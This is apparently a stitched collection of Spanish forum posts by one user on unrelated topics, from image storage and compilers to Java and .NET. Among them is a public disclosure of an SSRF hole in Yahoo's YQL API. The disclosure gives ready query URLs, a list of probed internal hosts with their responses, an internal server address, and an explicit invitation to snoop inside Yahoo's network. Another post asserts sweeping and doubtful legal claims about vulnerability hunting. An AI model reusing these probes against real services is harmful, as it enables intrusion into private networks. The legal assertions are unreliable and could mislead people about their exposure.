Mensajes

Alguien sabe que ocupa menos memoria y menos CPU?

Opcion 1: guardar el binario de varias imagenes en data:base64 dentro de un tag html.
Opcion 2: guardar el binario de var5ias imagenes en data:base64 dentro de un array en javascript.

No se si el motor de javascript consumirá mas memoria o no que el mismo tag de html por el tema del DOM y todo eso.

Me gustaría utilizar Storage de HTML5 pero aun está muy nuevo, las versiones normales de firefox y chrome no las soporta que yo sepa, solo las ultimas.

Alguien sabe?

Eso es mas viejo que mi mouse con bolita abajo.

[Customer By Email (WHK Yan) 07/08/2013 07:49 AM]

Søra, ahi está tu respuesta:

Customer By Email (WHK Yan)   07/08/2013 07:49 AM
Hola, disculpe que no le escriba en ingles pero solamente se español.

He encontrad un problema de seguridad en Yahoo QL la cual podría permitir el acceso no autorizado a la red local.

Por ejemplo:
http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=select * from html where url = "http://192.168.1.1/"
...
http://localhostx/ : 502 - Cannot find server
http://localhost/ : 200 Empty
http://192.168.0.1/ : 403
http://192.168.1.1/ : 502 - Network is unreachable
http://adminx/ : 502 - Cannot find server
http://admin/ : 400 - Bad Request
http://zebra/ : 502 - Cannot find server
http://jaguar/ : 400 - Bad Request
http://intranet/ : 502 - Cannot find server
http://local/ : 404 - Not Found
http://dev/ : 404 - Not Found on Accelerator
http://developer/ : 404 - Not Found on Accelerator
http://servers/ : 400 - Bad Request
http://labs/ : 400 - Bad Request

No estoy seguro si en algún momento será posible acceder a algún servicio o poder burlar la api para poder ingresar a algún servidor local, pero si ha revelado información muy sensible sobre la estructura interna de los servidores. Por ejemplo un delincuente informático ya sería capaz de saber que el nivel de red local varía entre 192.168.0.x y podría realizar un barrido de ips escaneando todos los posibles puntos de accesos y preparar un ataque mas sofisticado comprometiendo la información confidencial que pueda almacenar cada uno o ls puntos que tengan acceso directo a el.

Saludos.


Response Via Email (Louise Carter)
Hi WHK,

Thanks for contacting Yahoo!.

The Yahoo! service that you have written about is targeted at a primarily English-speaking audience. Yahoo! is able to take appropriate action against content posted by users on Yahoo! services that may violate the Yahoo! Terms of Service

We are currently unable to determine if the content posted on the site you wrote us about is in violation of the Yahoo! Terms of Service. If you believe that you may be in danger, please contact your local law enforcement agency immediately. Otherwise, forward a translation of the abusive material, and we will review the situation further and take appropriate action.

You can find some extra information about this (and other Yahoo! products) through Yahoo! Help Central.

Thanks again,

Louise Carter

Yahoo! Customer Care

Muestrame cual es la pagina y te doy el codigo para que quites el recuadro.

Saludos.

Solo habría que crear un canal de comunicación con dichas Máquinas Virtuales y que éstas sean capaces de reconocer y generar el ejecutable compilado para su propia plataforma.

Eso si, es totalmente distinto a lo expuesto al comienzo pero tienes toda la razón y es muy factible y tienes toda la razón de que pueda ser algo simple.

Por ejemplo, creamos un código, llamemoslo c$ que su sintaxis sea perfectamente la misma que java, ahora digamos que lo vamos a compilar, entonces el compilador toma todas las instrucciones del código y lo compila para código máquina embebiendo todas las librerías en formato .h necesarias para que funcione bién, este debería ser capaz de generar por lo menos 4 binarios: un exe (windows), un binario de gnu/linux, un binario para unix (mac) y otro para bsd.

Solo entonces no dependería de una maquina virtual porque el compilador debería ser el encargado de interpretar linea por linea el código y saber generar las mismas instrucciones en código máquina para cada plataforma ahorrando el traspaso de librerías, mv, etc.

Por ejemplo:

Código [Seleccionar] Expandir

{ System.console().writer().println("hola"); }

Al compilarlo debería generar un archivo binario para windows que haga uso de la librería strings.h para windows, al generar uno para linux que haga uso de strings.h para linux y así para cada sistema donde cada archivo .h o .cpp contenga la equivalencia en su sistema operativo y lo compile y genere los 4 ejecutables, cosa que cuando llames al de windows a traves del cmd este diga "hola" y al llevar el binario de linux a ese sistema y ejecutarlo desde el bash también diga "hola".

Las rutas de directorios deberían llamarse igual que en java: /a/b/c, donde / equivale a c: y para entrar a d: podría ser por ejemplo: disk://d/a/b/c, entrará al disco d de windows al directorio a/b/c, y cuando se ejecute en linux entrará al disco montado con nombre "d" y si no existe dará una excepción.

Como se ve, es 100% posible, tendrá sus ventajas y desventajas, no las conozco pero la idea no es mala, talves algo que en java pese 100kb termine pesando 50mb pero ya no necesitará de la maquina virtual que pesa al rededor de 500mb en total y al ser ejecutado en tiempo real su velocidad sería mucho mayor.

Verdaderamente bueno WHK, Una duda ¿Lo has reportado a yahoo?

Un saludo!

Lo intenté pero para poder reportar un problema de seguridad debes saber ingles perfectamente (-1, no es mi lengua nativa) y a demás hay que pasar por toda una serie de formularios y registros (-2) que al final en ves de terminar reportando un bug terminan ellos desmoralizandote, algo así como sucede con las operadoras de movistar, despues de una hora recién puedes optar por hablar con alguien.

Asi que para que calentarme la cabeza, mejor lo posteo en el foro y ya, si con el tiempo alguien le saca provecho entonces recién se apresurarán a parcharlo, talves resulte mas rápido que intentar reportarlo.

Genial! ahora los tooltips embebidos en el escalado de la imagen mantienen su tamaño original

Código (javascript) [Seleccionar] Expandir

var invertido = 100 + ((100 - this.zoomActual) * 2 * (100 / this.zoomActual / 2));
$('._cargar_imagen_original_corte_info').css({
'transform': 'scale(' + (invertido / 100) + ')'
});

El problema es el mismo de siempre, los nucleos de linux, unix y windows son distintos, por lo tanto es imposible ejecutar algo en ambos lados con el mismo código sin ser interpretado.

Por esto se crearon los lenguajes interpretados en el cual el interpretador es el encargado de ejecutar todas las funciones utilizadas en el script o binario.

Por ejemplo: perl, php, python, ruby, pascal, java, etc.

El gran problema de .Net es que no funciona en otros sistemas que no sean windows si lo compilas directamente a .exe, mono interpreta pero ya pierde toda lógica, por eso java es mucho mas potente ya que el objetivo de un lenguaje interpretado es la multi plataforma sin mayor esfuerzo donde tu aplicación pueda tener exactamente el mismo rendimiento, ventajas y funcionalidad en ambos sistemas, con .net no puedes utilizar todo su poder en sistemas libres porque dependerias de las dependencias de Windows en muchas ocasiones, en cambio java todos los sistemas funcionan por igual.

Volviendo al tema, no es mala idea pero el desgaste de trabajo es enorme y requiere de mucho conocimiento a nivel de ensamblador a menos que quieras usar las apis de cada sistema operativo (doble trabajo).

[68.142.224.71:11211]

Vamos a convertirnos en trolls por un par de minutos y vamos a darle un vistazo a la consola QL de Yahoo la cual permite realizar multiples consultas a distintas apis de Yahoo pero a modo de SQL.

Ejemplo de una simple query:
http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=show tables

Esto nos devolverá todas las tablas (servicios, apis).

Ahora probaremos utilizar la api HTML de la siguiente manera:
http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=select * from html where url = "http://foro.elhacker.net/"

Esto nos devolverá el contenido HTML parseado en XML.

Ahora que ya entendimos un poco sobre el funcionamiento de YQL vamos a trollear un poco:
http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=select * from html where url = "http://192.168.1.1/"

Nos retornará:

Código (xml) [Seleccionar] Expandir

<url ... http-status-code="502" http-status-message="Network is unreachable">http://192.168.1.1/</url>

Pero si intentamos entrar a la subred local 0.1: http://query.yahooapis.com/v1/public/yql?diagnostics=true&q=select * from html where url = "http://192.168.0.1/"

Código (xml) [Seleccionar] Expandir

<url ... http-status-code="403" http-status-message="Forbidden">http://192.168.0.1/</url>

Esto nos demuestra una cosa: que la api de peticiones HTTP no filtra ips ni dominios asi que podemos pasearnos por toda la red local si queremos ya que al intentar entrar a la puerta predeterminada de enlace (router o switch o lo que sea) nos arrojó un error 403 que probablemente haya retornado el panel de administración del router ya que cuando probamos con otras ips locales simplemente nos dice que es imposible conectarse (error 502 Cannot find server).

Probamos otras urls sensibles:
http://localhostx/ : 502 - Cannot find server
http://localhost/ : 200 Empty
http://192.168.0.1/ : 403 (necesita autorización, ¿como?: buena pregunta)
http://192.168.1.1/ : 502 - Network is unreachable
http://adminx/ : 502 - Cannot find server
http://admin/ : 400 - Bad Request
http://zebra/ : 502 - Cannot find server
http://jaguar/ : 400 - Bad Request
http://intranet/ : 502 - Cannot find server
http://admin/login/ : Timed out waiting for operation - failing node: memcache4.yql.bf1.yahoo.com/68.142.224.71:11211
http://68.142.224.71/ : 502 - Connection refused
http://local/ : 404 - Not Found Tenemos acceso a un servidor WEB local!
http://dev/ : 404 - Not Found on Accelerator Tenemos acceso a un servidor WEB local!
http://developer/ : 404 - Not Found on Accelerator Tenemos acceso a un servidor WEB local!
http://servers/ : 400 - Bad Request
http://labs/ : 400 - Bad Request

Información útil para comenzar a husmear dentro de los servidores locales de yahoo

Saludos.

No es ilegal en ninguna parte del mundo, de hecho no hay ley contra ello.

Busca mas información sobre políticas de full disclosure, Google tiene su propia política, Apple tiene otra, Microsoft tiene otra y así.

Si la empresa donde encontraste la vulnerabilidad no tiene ninguna política sobre full disclosure expuesta en su mismo sitio WEB entonces podrás hacer lo que estimes conveniente con lo encontrado y será absolutamente legal.

El tema del full disclosure es un tema larguiiiiiiiisimo y ampliamente discutido por muchas grandes compañías, actualmente este tema está a nivel "filosófico" tal como dijo implícitamente ivancea96 ya que puedes publicar a quien sea lo descubierto o puedes decirselo por correo de forma interna y ambas maneras son 100% legales.

Si lo que quieres es simpatizar con el dueño de la empresa y obtener un trabajo entonces hablale por interno a traves del correo del gerente de la empresa, no del webmaster o del contacto técnico ya que el administrador del sitio no va a querer perder su trabajo, haces todo un informe bien detallado sobre como sacar provecho de dicha vulnerabilidad y es muy muy muy importante que mensiones que nada de sus sistemas fue comprometido durante el análisis ni penetraste en sus datos confidenciales pero que alguien mas si podría hacerlo.

Con esto no podrá realizar ninguna acción legal contra ti y quedará en un dilema moral sobre si dejar su agujero de seguridad abierto o llamarte para que lo arregles.

Cuando tu entras a un sitio WEB estas viendo un sistema a nivel de "vista" o sea solamente el código que se interpretará en tu navegador, en este caso el html, javascript etc y es de código abierto, por tanto nadie te puede prohibir algo que es público, por algo la página está en un servicio público WEB.

Lo que no puedes hacer y si está penado por la ley en algunos paises es entrar y destruir, modificar cosas, obtener datos ocultos que pueden ser la base de datos, datos personales de personas, etc... todo aquello que pueda traer un problema de privacidad de datos.

Todo lo demás que sale por el servidor es público, por lo tanto no es privado.

Por ejemplo:
Encontrar un XSS es legal.
Encontrar una backup de datos personales con tarjetas de crédito y descargarlos y venderlos o publicarlos es ilegal, si lo descargas no es ilegal porque estaba público, si lo descargas a traves de un LFI por ejemplo es ilegal porque te aprobechaste de un agujero de seguridad para obtener un dato privado del servidor, no era público.